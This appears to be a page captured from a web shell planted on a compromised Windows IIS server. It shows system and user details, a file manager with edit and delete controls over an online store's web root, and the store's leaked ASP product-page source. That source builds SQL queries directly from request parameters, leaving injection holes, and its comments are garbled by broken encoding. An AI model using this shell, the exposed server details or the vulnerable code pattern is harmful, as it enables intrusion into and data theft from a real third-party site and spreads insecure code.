Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <!--#include file="conn.asp" --> <!--#include file="connms.asp" --> <!--#include file="function.asp"--> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <script type="text/javascript"> function check() { //������ʽ�ж� //var re = /^[0-9]+.?[0-9]*$/;//�ж��ַ����Ƿ�Ϊ���� var re = /^[1-9]+[0-9]*]*$/;//�ж��ַ����Ƿ�Ϊ������ if (re.test(document.business.qty.value) ) { return true; } else if(re.test(document.business.bookingNum.value)) { return true } else { alert("Please enter a positive integer"); return false; } } </script> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <% Function UrlOK(strURL) On Error Resume Next If strURL<>"" Then Set objHTTP = CreateObject("MSXML2.XMLHTTP") objHTTP.Open "GET", strURL, FALSE objHTTP.Send If instr(objHTTP.statusText,"OK") Then UrlOK = "��Ч" Else UrlOK = "��Ч" End if Else UrlOK = "����:��û��������ַ!" End If End Function Set fs=Server.CreateObject("Scripting.FileSystemObject") Dim SS(1000,6) Dim ASC365_Cart_001 productid=request.QueryString("productid") typeid1=request.QueryString("typeid") if len(productid)<>6 then productid=request.Form("productid") end if set rs1=server.CreateObject("adodb.recordset") sql1="select * from newproductlist where productid='"&productid&"'" rs1.open sql1,conn,1,1 if not rs1.eof then productname=rs1("productname") rs1.close end if if request("Action")="Addtoshipping" then Cart_js=0 productid=request.Form("productid") productname=request.Form("productname") price=request.Form("price") weight=request.Form("weight") productnumber=request.Form("qty") yudingNum=request.Form("bookingNum") yudingprice=request.Form("yudingprice") usedstate=request.Form("usedstate") ASC365_Cart_001=request.Cookies("ASC365_Cart_001") ASC365_Cart_002=request.Cookies("ASC365_Cart_002") aa=0 if Isnumeric(productnumber)=true then if len(ASC365_Cart_001)<>0 then temp=split(ASC365_Cart_001,"|") N_js=ubound(temp) for i=1 to N_js step 7 SS(Cart_js,0)=temp(i) '��Ʒ���� SS(Cart_js,1)=temp(i+1) '��Ʒ���� SS(Cart_js,2)=temp(i+2) '��Ʒ���� SS(Cart_js,3)=temp(i+3) '��Ʒ��� SS(Cart_js,4)=temp(i+4) '���� SS(Cart_js,5)=temp(i+5) '���� SS(Cart_js,6)=temp(i+6) '���� if SS(Cart_js,0)=productid and SS(Cart_js,6)="n" then SS(Cart_js,4)=SS(Cart_js,4)*1+productnumber aa=1 end if Cart_js=Cart_js+1 next end if if aa=0 then ASC365_Cart_001=ASC365_Cart_001&"|" & productid& "|" & productname& "|" & weight& "|" & price& "|" & productnumber & "|" & "|n" else ASC365_Cart_001="" for i=0 to Cart_js-1 if SS(i,0)<>"*" then ASC365_Cart_001=ASC365_Cart_001&"|"&SS(i,0)&"|"&SS(i,1)&"|"&SS(i,2)&"|"&SS(i,3)&"|"&SS(i,4)&"|"&SS(i,5)&"|"&SS(i,6) end if next end if response.Cookies("ASC365_Cart_001")=ASC365_Cart_001 Response.Write("<script>alert('Added successfully,Please check it in Shopping Cart');</script>") end if end if %> <title><%=productname%></title> <style type="text/css"> <!-- .STYLEd { font-size: 19px; font-weight: bold; font-family: Verdana, Arial, Helvetica, sans-serif; } a{ position:relative; text-decoration:none; color:#666666; } a:hover{ position:relative; text-decoration:underline; } .STYLE1 {color: #FF0000} --> </style> </head> <body style="width:1000px; margin:0 auto; text-align:center;background-color:#F1F1F1"> <table width="1000" border="0" style="width:1000px; background-color:#ffffff"> <tr> <td width="1000"> <% server.Execute("head.asp") %> </td></tr> <tr> <td align="left" style="height:50px"> <% dim typepath(10,2) typeid=request.QueryString("typeid") if len(typeid)=0 then typeid=request.Form("typeid") end if if len(typeid)>0 then set rsa=server.CreateObject("adodb.recordset") sqla="select * from menu1 where id="&typeid&"" rsa.open sqla,conn,1,1 fatherpath=split(rsa("ParentPath"),",") if ubound(fatherpath)>0 then for ii=1 to ubound(fatherpath) newid=fatherpath(ii) set rsb=server.CreateObject("adodb.recordset") sqlb="select * from menu1 where id="&newid&"" rsb.open sqlb,conn,1,1 typepath(ii,0)=rsb("id") typepath(ii,1)=rsb("CName") rsb.close next typepath(ii+1,0)=rsa("id") typepath(ii+1,1)=rsa("CName") else typepath(ii,0)=rsa("id") typepath(ii,1)=rsa("CName") end if end if %> <% for i=0 to 10 if len(typepath(i,0))>0 then %> <a href="productlist.asp?typeid=<%=typepath(i,0)%>"><%=typepath(i,1)%></a><span class="STYLE21">></span> <% end if next %> </td> </tr> <tr> <td valign="top"> <% productid=request.QueryString("Productid") set rs=server.CreateObject("adodb.recordset") sql="select * from newproductlist where productid='"&productid&"'" rs.open sql,conn,1,1 if not rs.eof then dpages="http://buyyou.net/ASC365_canada//"&rs("ImgPrev") %> <table width="990" border="0" cellpadding="0" cellspacing="0"> <tr> <th width="250" height="250" scope="col"><img src="<%=rs("ImgPrev")%>" border="0" style="width:250px"/></th> <th width="740" scope="col" style="background-color:#CCCCCC"> <form method="post" name="business" action="?Action=Addtoshipping&productid=<%=rs("productid")%>&typeid=<%=rs("typeid")%>" onSubmit="return check()"> <table width="640" height="200" border="0" cellspacing="0" cellpadding="0" style="text-align:left; margin-left:100px"> <tr> <input type="hidden" name="productid" value="<%=rs("productid")%>" /> <th colspan="2" align="left" scope="col"><div align="center"> <input type="hidden" name="productname" value="<%=Server.HtmlEncode(rs("productname"))%>" /> <font style="font-family:Verdana, Arial, Helvetica, sans-serif; font-size:16px"><%=rs("productid")%>:<%=rs("productname")%></font></div></th> </tr> <tr> <td width="166"><div align="left">Unit:</div></td> <td width="484"><%=rs("productunit")%></td> </tr> <tr> <% newprice=rs("price1") if rs("tejia")=1 then newprice=rs("price2") end if %> <td><div align="left">Price:</div></td> <td><input type="hidden" name="price" value="<%=newprice%>" /> <%= FormatNumber(newprice, 2, -1)%>$</td> </tr> <tr> <td><div align="left">Weight:</div></td> <td><input type="hidden" name="weight" value="<%=rs("weight")%>" /> <%= FormatNumber(rs("weight"), 2, -1)%>kg</td> </tr> <tr> <td><div align="left">QTY:</div></td> <td><input name="qty" type="text" size="5" /><input name="usedstate" type="hidden" size="5" value="n"/></td> </tr> <tr> <td colspan="2"> <% useful=rs("useful") if useful=1 then %> <input name="image" type="image" value="add to cart" src="image/addtocart.jpg" /> <% else %> <span class="STYLE1">Out Of Stock</span> <% end if %> </td> </tr> <% yudingprice=rs("yudingprice") if yudingprice>0 then %> <% end if %> <tr> <td colspan="2"> </td> </tr> </table> </form> <form method="post" action="pricewatch.asp?productid=<%=rs("productid")%>&typeid=<%=rs("typeid")%>"> <div align="left" style="margin-left:100px"> <input type="hidden" name="productid" value="<%=rs("productid")%>"/> <input type="image" src="image/pricewatch.jpg"/> </div> </form> </th> </tr> </table> <table style="width:999px; border:0;"> <tr> <td valign="top"> <table width="180" border="0" cellpadding="0" cellspacing="0"> <tr> <td> </br> <div align="center" class="STYLEd">Similar products </div> </br> </td> </tr> <% set rs1=server.CreateObject("adodb.recordset") sql1="select top 5 * from newproductlist where typeid='"&typeid1&"' and productid <>'"&productid&"'" rs1.open sql1,conn,1,1 do while not rs1.eof dpages1="http://buyyou.net/ASC365_canada//"&rs1("ImgPrev") %> <tr> <td> <p><a href="newproductdetail.asp?productid=<%=rs1("productid")%>&typeid=<%=rs1("typeid")%>" target="_blank"><img src="<%=rs1("ImgPrev")%>" border="0" style="width:180px"/></a></p> <p><a href="newproductdetail.asp?productid=<%=rs1("productid")%>&typeid=<%=rs1("typeid")%>" style="text-decoration:none" target="_blank"><%=rs1("productid")%>:<%=rs1("productname")%></a></p> </td> </tr> <% rs1.movenext loop %> </table></td> <td style=" width:800px" valign="top"> <div style="width:799px; overflow:hidden; text-align:left"> <% set rsms=server.CreateObject("adodb.recordset") sql="select * from bu_prdprd where prdcode='"&productid&"'" rsms.open sql,connms,1,1 if not ( rsms.eof and rsms.bof) then Temp = rsms("prddesc") 'Temp="http://buyyou.net/ASC365_canada/admin/251/401/0000mainpage.htm" if left(Temp,4)= "data" then 'Temp = "http://173.248.132.52/cbe/"&Temp Temp = "http://topseller365.com/"&Temp end if if UrlOK(Temp)="��Ч" then 'response.Write(Temp) response.write getHTTPPage(Temp) end if end if rsms.close %> </div> </td> </tr> </table> <% end if rs.close %> </td> </tr> <tr> <td> <% server.Execute("bottom.asp") %> </td> </tr> </table> <% conn.close set conn=nothing %> </body> </html>